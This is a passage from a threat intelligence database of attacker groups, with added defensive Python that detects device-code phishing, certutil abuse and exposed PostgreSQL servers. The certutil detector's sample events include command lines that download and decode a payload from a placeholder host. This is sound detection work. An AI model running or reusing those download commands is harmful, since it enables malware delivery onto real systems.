Strobes VI
Strobes vulnerability intelligence is a key component of their Exposure Management platform that helps organizations understand, prioritize, and address security vulnerabilities more effectively.

© 2026 Strobes Security. All rights reserved.

Threat Actors Database

Track APT groups, cybercriminal organizations, and the vulnerabilities they exploit

Total threat actors: 880
TRIPLESTRENGTH

TRIPLESTRENGTH is a financially motivated threat actor targeting cloud environments and on-premises infrastructures for cryptojacking, ransomware, and extortion. They exploit stolen credentials, cookies, and information stealer logs to gain unauthorized access to platforms like Google Cloud, AWS, and Microsoft Azure, deploying the unMiner application for cryptocurrency mining. Their ransomware operations utilize lockers such as Phobos, LokiLocker, and RCRU64, involving lateral movement and mass encryption. TRIPLESTRENGTH also engages in account hijacking and collaborates with partners for ransomware and blackmail operations, advertising their services in hacking-focused Telegram channels.

Storm-2372
RU

Storm-2372 is a suspected nation-state actor aligned with Russian interests that runs device code phishing campaigns against governments, NGOs, and a range of industries across Europe, North America, Africa, and the Middle East. The actor builds rapport by impersonating prominent individuals over third-party messaging services such as WhatsApp and Signal before sending phishing invitations. The invitations lure users into completing an OAuth device code authorization request on a legitimate Microsoft sign-in page; because the attacker's client started the flow, the resulting tokens are issued to the attacker, granting Storm-2372 access to the victim's account without ever capturing the password and enabling Microsoft Graph API data collection, including email harvesting. Microsoft has observed the actor running keyword searches within compromised accounts to locate and exfiltrate sensitive information.
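As an added illustration (not Strobes' or Microsoft's code), the following Python sketches the check a defender would run over exported Entra ID sign-in logs for this tradecraft: successful sign-ins that used the device code flow, followed within a short window by successful activity for the same user from a different IP address. The sample events are constructed. The `deviceCode` value of `AuthenticationProtocol` is the one Microsoft's published hunting guidance keys on; that the export carries exactly the columns used here (`ResultType`, `IPAddress`, `AppDisplayName`) is an assumption of the example.

```python
from datetime import datetime, timedelta

# Constructed sample sign-in events (all values invented; not real telemetry).
# Field names mirror the Entra ID SigninLogs columns; treating this subset as the
# full schema is an assumption of the example.
SAMPLE_SIGNIN_LOGS = [
    {"TimeGenerated": "2025-02-10T09:00:12Z", "UserPrincipalName": "alice@example.org",
     "AuthenticationProtocol": "deviceCode", "IPAddress": "203.0.113.10",
     "ResultType": "0", "AppDisplayName": "Microsoft Office"},
    {"TimeGenerated": "2025-02-10T09:18:40Z", "UserPrincipalName": "alice@example.org",
     "AuthenticationProtocol": "none", "IPAddress": "198.51.100.7",
     "ResultType": "0", "AppDisplayName": "Microsoft Graph"},
    {"TimeGenerated": "2025-02-10T10:05:00Z", "UserPrincipalName": "bob@example.org",
     "AuthenticationProtocol": "deviceCode", "IPAddress": "192.0.2.44",
     "ResultType": "50126", "AppDisplayName": "Microsoft Office"},   # failed attempt
    {"TimeGenerated": "2025-02-10T11:30:00Z", "UserPrincipalName": "carol@example.org",
     "AuthenticationProtocol": "none", "IPAddress": "192.0.2.9",
     "ResultType": "0", "AppDisplayName": "Outlook"},
    {"TimeGenerated": "2025-02-10T12:00:00Z", "UserPrincipalName": "dave@example.org",
     "AuthenticationProtocol": "deviceCode", "IPAddress": "192.0.2.77",
     "ResultType": "0", "AppDisplayName": "Microsoft Office"},
    {"TimeGenerated": "2025-02-10T12:02:00Z", "UserPrincipalName": "dave@example.org",
     "AuthenticationProtocol": "none", "IPAddress": "192.0.2.77",
     "ResultType": "0", "AppDisplayName": "Microsoft Graph"},       # same IP: likely legitimate
]


def _ts(value):
    return datetime.strptime(value, "%Y-%m-%dT%H:%M:%SZ")


def successful_device_code_signins(events):
    """Sign-ins completed through the OAuth device code flow (ResultType "0" = success)."""
    return [e for e in events
            if e.get("AuthenticationProtocol") == "deviceCode" and e.get("ResultType") == "0"]


def correlate_followon(events, window_minutes=60):
    """For every successful device code sign-in, report later successful activity by
    the same user from a different IP inside the window. The victim completes the
    code from their own network while the attacker's client polls for the tokens
    from its own infrastructure, so an IP split shortly after the device code
    sign-in is the first thing worth triaging."""
    alerts = []
    for dc in successful_device_code_signins(events):
        start = _ts(dc["TimeGenerated"])
        end = start + timedelta(minutes=window_minutes)
        for e in events:
            if e is dc or e.get("UserPrincipalName") != dc["UserPrincipalName"]:
                continue
            if e.get("ResultType") != "0" or e.get("IPAddress") == dc["IPAddress"]:
                continue
            if start <= _ts(e["TimeGenerated"]) <= end:
                alerts.append({"user": dc["UserPrincipalName"],
                               "device_code_ip": dc["IPAddress"],
                               "followon_ip": e["IPAddress"],
                               "app": e.get("AppDisplayName")})
    return alerts


if __name__ == "__main__":
    for a in correlate_followon(SAMPLE_SIGNIN_LOGS):
        print(f"[device-code-phish?] {a['user']}: code completed from {a['device_code_ip']}, "
              f"tokens then used from {a['followon_ip']} against {a['app']}")
```

The IP split is a triage signal rather than proof: a user on a VPN can legitimately produce one. The durable fix is a Conditional Access policy that blocks the device code flow for users who have no need of it, since tokens issued this way are valid regardless of where the password was typed.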

Head Mare

Head Mare is a hacktivist-oriented threat actor known for targeting organizations in Russia and Belarus with a remote access tool called PhantomRAT. It has been observed executing malicious code through specially crafted RAR archives, a departure from earlier attacks that exploited software vulnerabilities. Attribution of the campaign to Ukraine remains uncertain because of limited visibility into Russian networks. The use of RAR archives in the PhantomCore attack chain has previously been observed with other threat actor groups, such as Forest Blizzard.

GamaCopy

GamaCopy is a threat actor first identified in June 2023 and active since at least August 2021, known for cyberattacks against Russia's defense and critical infrastructure sectors that mimic the TTPs of Gamaredon. It primarily uses Russian-language decoy documents related to military facilities. Analysis of attack samples shows considerable overlap in code structure and tactics, including the use of 7z-SFX self-extracting archives to install UltraVNC and outbound connections over port 443. GamaCopy employs open-source tools to obscure its activities while pursuing sensitive information in the context of the Russia-Ukraine conflict.

Mora_001
RU

Mora_001 is a threat actor with a distinct operational signature that combines opportunistic attacks with ties to the LockBit ecosystem. The actor has been observed exploiting CVE-2024-55591 and CVE-2025-24472, authentication bypass vulnerabilities affecting Fortinet FortiOS and FortiProxy. The ransom note associated with Mora_001 includes the same TOX ID used by LockBit, indicating a potential affiliation or a shared communication channel. Their post-exploitation patterns suggest a structured playbook that differentiates them from other ransomware operators, including LockBit affiliates.

LinkC Pub

aka: LinkC

LinkC is a newly emerged ransomware group that operates a Tor (.onion) data leak site and has claimed one victim, the U.S.-based AI and cloud service provider H2O.ai, attacked on January 29, 2025. The group demanded a $15 million ransom for decryption and data removal, displaying samples of sensitive information, including GPT model source code and customer data, as proof of access. LinkC's DLS is well-constructed and loads quickly, suggesting capacity for further victim listings. There is currently no public acknowledgment from the victim, and the group has not engaged on cybercrime forums.

ScreamedJungle

ScreamedJungle is a threat actor that exploits vulnerabilities in outdated Magento e-commerce platforms to inject malicious JavaScript code, specifically Bablosoft JS, into compromised websites. This actor has harvested millions of browser fingerprints by leveraging vulnerabilities such as CVE-2024-34102 and CVE-2024-20720. ScreamedJungle utilizes PerfectCanvas technology to ensure pixel-perfect replication of legitimate user fingerprints. Group-IB analysts estimate that over 115 e-commerce sites have been impacted by this fingerprint theft campaign.

Storm-0249

aka: DEV-0249

Storm-0249 is an access broker active since 2021, known for distributing BazaLoader, IcedID, Bumblebee, and Emotet malware. The actor primarily employs phishing emails to deliver malware payloads, as evidenced by a campaign involving tax-themed emails that aimed to distribute BRc4 and Latrodectus malware. Storm-0249 has facilitated initial access for other threat actors, such as Storm-0501, by leveraging compromised credentials and exploiting known vulnerabilities in public-facing servers. Microsoft has detected malicious PDF attachments associated with Storm-0249's phishing campaigns.

GOFFEE

GOFFEE is a threat actor that has targeted entities in the Russian Federation since early 2022, employing spear phishing emails with malicious attachments, including modified Owowa and patched explorer.exe. They have utilized PowerTaskel, a non-public Mythic agent in PowerShell, and introduced a new implant called "PowerModul" for attacks against sectors such as media, telecommunications, and government. GOFFEE has increasingly shifted to a binary Mythic agent for lateral movement and has incorporated Word documents with malicious VBA scripts in their infection chains. The group has demonstrated a consistent evolution in their TTPs while maintaining identifiable characteristics that attribute their campaigns with high confidence.

UAT-5918

UAT-5918 is an APT group that targets entities in Taiwan, primarily in telecommunications, healthcare, and IT sectors, to establish long-term access for information theft. They exploit N-day vulnerabilities in unpatched web and application servers to gain initial access and utilize web shells, credential harvesting tools like Mimikatz and LaZagne, and red-teaming tools for post-compromise activities. UAT-5918 conducts network reconnaissance to pivot across endpoints, harvesting credentials and sensitive data, including database backups. Their operations show significant overlap with other APT groups in terms of TTPs and targeted industries.

Jabaroot
DZ

aka: Jabaroot DZ

JabaRoot is an Algerian hacker group that has targeted Moroccan government systems, successfully exfiltrating sensitive data from the Ministry of Economic Inclusion and the National Social Security Fund (CNSS). The group has claimed responsibility for the breach, which has raised concerns among cybersecurity experts about its scale and its impact on citizens' privacy. The motives behind the attack remain unclear, but it has been described as one of Morocco's most significant cyber-attacks, affecting a large number of individuals. Resecurity has identified the group's activities as part of a broader trend of APT activity targeting government entities in the region.

Storm-2460

Storm-2460 is a threat actor that has exploited elevation of privilege vulnerabilities to deploy PipeMagic malware and ransomware, enabling them to escalate access within compromised environments. They have been observed using the certutil utility to download malware from compromised legitimate third-party websites. Ransomware activity associated with Storm-2460 includes file encryption and the deployment of a ransom note named !_READ_ME_REXX2_!.txt. Microsoft recommends prioritizing security updates for elevation of privilege vulnerabilities to mitigate the impact of this actor's activities.
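The certutil download step is the most detectable part of the chain described above, and it is worth detecting on behaviour rather than destination, because a download from a compromised legitimate website passes any domain-reputation allowlist. The Python below, an added example that is not Strobes' or Microsoft's code, classifies certutil command lines from process-creation telemetry and separates the download and decode abuse patterns from ordinary certificate administration. The events, hostnames and URL are constructed placeholders.

```python
import re

# Constructed process-creation events (invented; not real telemetry). Only the
# fields the check needs are present, which is an assumption of the example.
SAMPLE_PROCESS_EVENTS = [
    {"host": "ws-014", "parent": "cmd.exe",
     "cmdline": "certutil.exe -urlcache -split -f http://cdn.example.net/img/upd.png C:\\Users\\Public\\upd.exe"},
    {"host": "ws-014", "parent": "cmd.exe",
     "cmdline": "certutil -decode C:\\Users\\Public\\upd.txt C:\\Users\\Public\\upd.dll"},
    {"host": "srv-01", "parent": "mmc.exe",
     "cmdline": "certutil -verify -urlfetch C:\\certs\\leaf.cer"},          # benign chain check
    {"host": "srv-02", "parent": "powershell.exe",
     "cmdline": "certutil -addstore Root C:\\certs\\corp-root.cer"},       # benign store update
]

URL_RE = re.compile(r"\bhttps?://\S+", re.IGNORECASE)


def classify_certutil(cmdline):
    """Tag a certutil command line as 'download', 'decode', or None when the
    invocation looks like ordinary certificate administration."""
    tokens = cmdline.strip().split()
    if not tokens or "certutil" not in tokens[0].lower():
        return None
    # certutil accepts both '-flag' and '/flag'; normalise so either form matches.
    flags = {t.lstrip("-/").lower() for t in tokens[1:] if t[0] in "-/"}
    if "urlcache" in flags and URL_RE.search(cmdline):
        return "download"   # -urlcache [-split] -f <url> <path> writes the HTTP response to disk
    if "decode" in flags:
        return "decode"     # base64-decodes a staged text blob into a binary
    return None


def detect_certutil_abuse(events):
    """Run the classifier over process events and return the suspicious ones,
    carrying the parent process and any URL so the analyst can pivot on them."""
    hits = []
    for e in events:
        tag = classify_certutil(e["cmdline"])
        if tag is not None:
            hits.append({"host": e["host"], "parent": e["parent"], "tag": tag,
                         "urls": URL_RE.findall(e["cmdline"]), "cmdline": e["cmdline"]})
    return hits


if __name__ == "__main__":
    for h in detect_certutil_abuse(SAMPLE_PROCESS_EVENTS):
        print(f"{h['host']} [{h['tag']}] parent={h['parent']} urls={h['urls']}: {h['cmdline']}")
```

`-verify -urlfetch` is deliberately left benign: it fetches CRL and AIA data during chain validation and is common on servers, so matching on the string `url` alone would drown the signal in noise.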

HollowQuill

SEQRITE Labs APT-Team has uncovered a campaign targeting the Baltic State Technical University, an institution known for defense, aerospace, and advanced engineering programs that contribute to Russia's military-industrial complex. Tracked as Operation HollowQuill, the campaign uses weaponized decoy documents masquerading as official research invitations to infiltrate academic, governmental, and defense-related networks. The threat actor delivers a malicious RAR file containing a .NET dropper, which in turn drops a Golang-based shellcode loader, a legitimate OneDrive application, and a decoy PDF, with Cobalt Strike as the final payload.

DieNet

aka: Shiite_Harvest

DieNet is a hacktivist group that emerged in March 2025, known for conducting DDoS attacks targeting entities associated with political figures, such as Trump businesses. The group has claimed responsibility for disabling ten significant Iraqi websites, framing the action as support for their affiliates in the “Shiite Harvest.” Their operations suggest motivations rooted in sectarian dynamics, with a coordinated effort indicated by the use of hashtags like #DieNet and #Shiite_Harvest. This reflects the use of cyber offensives as tools for political and ideological expression, mirroring offline sectarian tensions.

REF7707
CN

aka: CL-STA-0049

REF7707 is a cyber campaign targeting government entities, particularly a foreign ministry in South America, utilizing malware families such as FinalDraft, GuidLoader, and PathLoader for persistence and lateral movement. The threat actor employs the Microsoft Graph API for C2 communication, blending malicious traffic with legitimate activity to evade detection. Despite their technical sophistication, REF7707 operators exhibited poor operational security, leading to the exposure of their infrastructure and malware. Their tactics enable the extraction of sensitive data, including passwords and Active Directory information, facilitating ongoing espionage activities.

UAC-0219

UAC-0219 is a hacking group observed conducting cyber-espionage operations targeting Ukrainian critical sectors, primarily utilising WRECKSTEEL malware for file exfiltration in both VBScript and PowerShell variants. Their activities focus on gathering intelligence from military innovation hubs, armed forces, law enforcement, and regional government institutions. CERT-UA has linked multiple cyber-attacks against government agencies and critical infrastructure in Ukraine to UAC-0219, emphasizing their reliance on specialized malware for sensitive information theft. The group’s operations are characterized by stealthy access and data exfiltration tactics, consistent with state-sponsored APT behavior.

Operation ForumTroll

Operation ForumTroll is a sophisticated cyber espionage campaign discovered by Kaspersky in mid-March 2025. The attack exploited a zero-day vulnerability in Google Chrome, CVE-2025-2783, which allowed attackers to escape the browser's sandbox. Victims were infected by clicking personalized phishing links in emails purporting to come from the organizers of the "Primakov Readings" forum; targets included media outlets, educational institutions, and government organizations in Russia. The goal of the attack appears to be espionage, and the campaign is believed to be the work of a state-sponsored APT group. Google released a fix for the vulnerability shortly after being notified by Kaspersky.

Earth Alux
CN

Earth Alux is a China-linked APT group known for conducting cyberespionage attacks across various sectors, including government, technology, and telecommunications. They primarily exploit vulnerable services in exposed servers to gain initial access, implanting web shells like GODZILLA and deploying backdoors such as VARGEIT and COBEACON. The group employs tools like RSBINJECT and MASQLOADER for lateral movement and network discovery, while also utilizing RAILSETTER for persistence through mspaint injection. Their operations have predominantly targeted the APAC region and have extended to Latin America, with a focus on exfiltrating sensitive information to attacker-controlled cloud storage.

Water Gamayun
RU

Water Gamayun exploits the MSC EvilTwin zero-day vulnerability to compromise systems and exfiltrate data, utilizing custom payloads and advanced data exfiltration techniques. Their arsenal includes backdoors like SilentPrism and DarkWisp, as well as information stealers such as Stealc and Rhadamanthys. They employ delivery methods like provisioning malicious payloads through signed Microsoft Installer files and leveraging LOLBins to maintain persistence and control over infected systems. Comprehensive analysis of their command-and-control infrastructure reveals sophisticated evasion techniques and dynamic control capabilities.

JINX-0126

Wiz Threat Research identified a new variant of an ongoing campaign targeting misconfigured, publicly exposed PostgreSQL servers. The threat actor, tracked by Wiz as JINX-0126, abuses internet-facing PostgreSQL instances protected only by weak, guessable credentials to gain access and deploy XMRig-C3 cryptominers. The campaign was first documented by Aqua Security, but the actor has since evolved, adding defense evasion techniques such as deploying binaries with a unique hash per target and executing the miner payload filelessly, likely to evade CWPP solutions that rely solely on file hash reputation.
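The precondition for this campaign is a configuration problem, so the most useful check is on the configuration itself. The Python below, an added example that is not Wiz's or Strobes' code, parses pg_hba.conf and the listen_addresses setting from postgresql.conf and reports the combination JINX-0126 depends on: a server listening on all interfaces with a rule that accepts password-only logins from any address. The weak and hardened fragments are constructed; the parser assumes the CIDR address form of pg_hba rules.

```python
import re

# Constructed configuration fragments (invented; not taken from any real host).
WEAK_PG_HBA = """\
# TYPE  DATABASE  USER  ADDRESS        METHOD
local   all       all                  trust
host    all       all   0.0.0.0/0      md5
host    all       all   ::/0           password
"""

HARDENED_PG_HBA = """\
# TYPE  DATABASE  USER  ADDRESS        METHOD
local   all       all                  peer
hostssl app       app   10.20.0.0/16   scram-sha-256
host    all       all   0.0.0.0/0      reject
"""

WEAK_POSTGRESQL_CONF = "listen_addresses = '*'\nport = 5432\n"
HARDENED_POSTGRESQL_CONF = "listen_addresses = '10.20.0.5'\nport = 5432\n"

HOST_TYPES = {"host", "hostssl", "hostnossl", "hostgssenc", "hostnogssenc"}
ANYWHERE = {"0.0.0.0/0", "::/0"}


def parse_pg_hba(text):
    """Parse pg_hba.conf rules. Assumes the CIDR address form; the separate
    'IP MASK' two-column form is not handled (an assumption of the example)."""
    rules = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        f = line.split()
        if f[0] == "local" and len(f) >= 4:
            rules.append({"type": "local", "database": f[1], "user": f[2],
                          "address": None, "method": f[3]})
        elif f[0] in HOST_TYPES and len(f) >= 5:
            rules.append({"type": f[0], "database": f[1], "user": f[2],
                          "address": f[3], "method": f[4]})
    return rules


def listen_addresses(conf_text):
    """Value of listen_addresses, falling back to PostgreSQL's default of 'localhost'."""
    m = re.search(r"^\s*listen_addresses\s*=\s*'([^']*)'", conf_text, re.M)
    return m.group(1).strip() if m else "localhost"


def audit_postgres(pg_hba_text, postgresql_conf_text):
    """Return findings describing the exposure this campaign relies on."""
    findings = []
    listens_everywhere = listen_addresses(postgresql_conf_text) in ("*", "0.0.0.0", "::")
    open_to_internet = False
    for r in parse_pg_hba(pg_hba_text):
        where = f"{r['type']} {r['database']}/{r['user']}"
        if r["address"]:
            where += f" from {r['address']}"
        if r["method"] == "trust":
            findings.append(f"{where}: 'trust' grants access with no password at all")
        elif r["method"] == "password":
            findings.append(f"{where}: 'password' sends the password in cleartext; use scram-sha-256")
        elif r["method"] == "md5":
            findings.append(f"{where}: legacy md5 hashing; use scram-sha-256")
        if r["address"] in ANYWHERE and r["method"] != "reject":
            open_to_internet = True
            findings.append(f"{where}: accepts logins from any address; restrict to known networks")
    if listens_everywhere and open_to_internet:
        findings.append("listen_addresses='*' plus an any-address pg_hba rule: the server is "
                        "reachable from the internet and a guessable password is the only gate")
    return findings


if __name__ == "__main__":
    for label, hba, conf in (("weak", WEAK_PG_HBA, WEAK_POSTGRESQL_CONF),
                             ("hardened", HARDENED_PG_HBA, HARDENED_POSTGRESQL_CONF)):
        print(f"== {label}: {len(audit_postgres(hba, conf))} finding(s)")
        for f in audit_postgres(hba, conf):
            print("  -", f)
```

The hardened fragment keeps an explicit `reject` rule for `0.0.0.0/0` at the end so that a later, careless addition above it still cannot widen exposure silently; combined with a non-wildcard listen_addresses and scram-sha-256, the credential-guessing entry point this actor uses is gone, and the per-target hashing and fileless execution described above never get a chance to matter.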

Showing 821-840 of 880